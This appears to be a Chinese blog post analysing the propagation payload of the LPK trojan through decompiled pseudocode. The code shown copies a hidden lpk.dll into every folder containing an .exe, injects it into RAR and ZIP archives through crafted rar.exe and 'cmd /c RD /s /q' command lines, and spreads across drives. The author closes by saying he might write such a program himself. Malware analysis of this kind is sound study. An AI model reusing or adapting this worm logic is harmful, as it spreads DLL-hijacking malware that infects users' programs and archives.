LPK木马分析-03
作者:互联网
序言
前面分析是主程序, 下面分析载荷, 将
lpk.dll传播至每个含有exe文件夹中.
总览
BOOL __stdcall DllEntryPoint(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved)
{
BOOL result; // eax@9
if ( fdwReason == 1 )
{
hModule = hinstDLL;
GetModuleFileNameW(hinstDLL, (LPWSTR)&Filename, 0x104u);
DisableThreadLibraryCalls(hinstDLL);
if ( sub_10001134() == 1 ) // 获取资源 Ghijkl Nopqrstu Wxy, 这个字符串
{
if ( !sub_10001338() && !sub_100012BD() ) // 确定执行程序不是以hrl开头的, 且确保只有一个互斥量
sub_10001193();
if ( sub_100012F6() == 1 )
{
hEvent = CreateEventW(0, 1, 0, 0);
if ( hEvent )
sub_100019E6(); //重点
}
}
result = sub_100010CE(); // result 代表加载系统目录下的lpk是否成功
}
else
{
if ( !fdwReason )
{
if ( hEvent )
{
SetEvent(hEvent);
WaitForSingleObject(hObject, 0xFFFFFFFF);
CloseHandle(hObject);
CloseHandle(hEvent);
}
sub_10001123(); //释放
}
result = 1;
}
return result;
}
函数0x10001123
DWORD sub_100019E6()
{
DWORD result; // eax@2
hObject = CreateThread(0, 0, (LPTHREAD_START_ROUTINE)sub_100018D3, 0, 4u, 0); //创建新线程
if ( !SetThreadPriority(hObject, 0xFFFFFFF1) || (result = ResumeThread(hObject), result == 0xFFFFFFFF) )
{
result = TerminateThread(hObject, 0);
hObject = 0;
}
return result;
}
int __stdcall sub_100018D3()
{
DWORD v0; // edi@1
int v1; // ebx@2
char *v2; // ebp@2
HANDLE v3; // eax@5
HANDLE *v4; // esi@5
DWORD v5; // esi@11
int result; // eax@16
DWORD v7; // esi@18
signed int v8; // [sp+10h] [bp-C4h]@2
HANDLE Handles; // [sp+14h] [bp-C0h]@5
char v10; // [sp+74h] [bp-60h]@1
v0 = 0;
RtlZeroMemory(&v10, 0x60);
do
{
v1 = 2;
v2 = &v10;
v8 = 24;
do
{
// DriveType获取驱动器类型, U盘, RAM, 硬盘...
if ( *(_DWORD *)v2 != 1 && (unsigned int)(DriveType(v1) - 2) <= 2 )
{
v3 = CreateThread(0, 0, (LPTHREAD_START_ROUTINE)StartAddress, (LPVOID)v1, 4u, 0);
v4 = &Handles + v0;
*v4 = v3;
if ( v3 )
{
if ( SetThreadPriority(v3, 0xFFFFFFF1) != 1 || ResumeThread(*v4) == 0xFFFFFFFF )
{
TerminateThread(*v4, 0);
}
else
{
++v0;
*(_DWORD *)v2 = 1;
}
}
}
++v1;
v2 += 4;
--v8;
}
while ( v8 );
v5 = 0;
if ( v0 && WaitForMultipleObjects(v0, &Handles, 1, 0) != 0x102 )
{
RtlZeroMemory(&v10, 0x60);
if ( v0 )
{
do
CloseHandle(*(&Handles + v5++));
while ( v5 < v0 );
}
v0 = 0;
}
result = sub_10001606();
}
while ( result == 1 );
if ( v0 )
{
result = WaitForMultipleObjects(v0, &Handles, 1, 0xFFFFFFFF);
v7 = 0;
if ( v0 )
{
do
result = CloseHandle(*(&Handles + v7++));
while ( v7 < v0 );
}
}
return result;
}
函数StartAddress
函数功能: 搜索计算机中所有盘符中的文件夹, 查找
.exe, .rar, .zip等文件, 递归查找.
if ( (unsigned int)lpThreadParameter >= 0x100 )
{
lstrcpyW(&String1, (LPCWSTR)lpThreadParameter); //
}
else
{
lstrcpyW(&String1, L"A:\\");
String1 += (unsigned __int16)lpThreadParameter;
}
lstrcpyW(&String2, &String1); // 从C盘根目录开始
PathAppendW(&String1, &word_10002374);
hFindFile = FindFirstFileW(&String1, &FindFileData); //找第一个文件
....
while ( 1 )
{
if ( !lstrcmpiW(FindFileData.cFileName, L".") || !lstrcmpiW(FindFileData.cFileName, L"..") )// 忽略.和.., 这两个结果
goto LABEL_27;
if ( FindFileData.dwFileAttributes & 0x10 ) // 是否是目录
break;
v2 = PathFindExtensionW(FindFileData.cFileName);
lpString2 = v2;
if ( v2 )
{
if ( !lstrcmpiW(v2, L".EXE") ) // 查找exe文件
{
lstrcpyW(&String2, &String1);
PathAppendW(&String2, L"lpk.dll");
if ( GetFileAttributesW(&String2) != 0xFFFFFFFF )
goto LABEL_27;
CopyFileW(&Filename, &String2, 1); //复制到文件夹中
SetFileAttributesW(&String2, 7u);
}
if ( (!lstrcmpiW(lpString2, L".RAR") || !lstrcmpiW(lpString2, L".ZIP")) // 查找压缩文件
&& !FindFileData.nFileSizeHigh
&& FindFileData.nFileSizeLow < 0x3200000 )
{
lstrcpyW(&String2, &String1);
PathAppendW(&String2, FindFileData.cFileName);// 文件完整路径
sub_1000142B((int)&String2);
}
}
if ( WaitForSingleObject(hEvent, 0x14u) != 258 )
goto LABEL_14;
LABEL_27:
if ( FindNextFileW(hFindFile, &FindFileData) != 1 )
goto LABEL_15;
}
函数0x1000142B
函数功能: 对压缩文件解压, 将
v8 = 0x208;
result = (_WORD *)SHRegGetValueW(HKEY_CLASSES_ROOT, L"WinRAR\\shell\\open\\command", 0, 2, 0, &String1, &v8);
if ( !result )
{
if ( String1 == '"' )
{
lstrcpyW(&String1, &String2);
v2 = L"\"";
}
else
{
v2 = L" ";
}
result = (_WORD *)StrStrIW(&String1, v2);
if ( result )
{
*result = 0;
PathRemoveFileSpecW(&String1);
PathAppendW(&String1, L"rar.exe");
result = (_WORD *)GetFileAttributesW(&String1);
if ( result != (_WORD *)0xFFFFFFFF )
{
PathGetShortPath(&String1);
GetTempPathW(0x104u, &Buffer);
v3 = GetCurrentThreadId();
GetTempFileNameW(&Buffer, L"IRAR", v3, &Buffer);
wsprintfW(&CommandLine, L"cmd /c %s vb \"%s\" lpk.dll|find /i \"lpk.dll\"", &String1, a1, &Buffer);
result = (_WORD *)sub_10001398(&CommandLine, 0xEA60u);// 看是否存在lpk.dll文件
if ( result ) // 不存在
{
wsprintfW(&CommandLine, L"\"%s\" x \"%s\" *.exe \"%s\\\"", &String1, a1, &Buffer);// String1 = rar.exe
sub_10001398(&CommandLine, 0x1D4C0u); // 解压
StartAddress(&Buffer);
wsprintfW(&CommandLine, L"\"%s\" a -r -ep1\"%s\" \"%s\" \"%s\\lpk.dll\"", &String1, &Buffer, a1, &Buffer);
sub_10001398(&CommandLine, 0x3A980u); // 压缩
wsprintfW(&CommandLine, L"cmd /c RD /s /q \"%s\"", &Buffer);// 递归删除文件
result = (_WORD *)sub_10001398(&CommandLine, 0xEA60u);
}
}
}
}
总结
总的来说, 这个不算太难, 有机会按照这个思路, 自己写一下这个程序.
标签:03,sub,Buffer,v2,LPK,result,木马,String2,String1 来源: https://blog.csdn.net/qq_33528164/article/details/89790626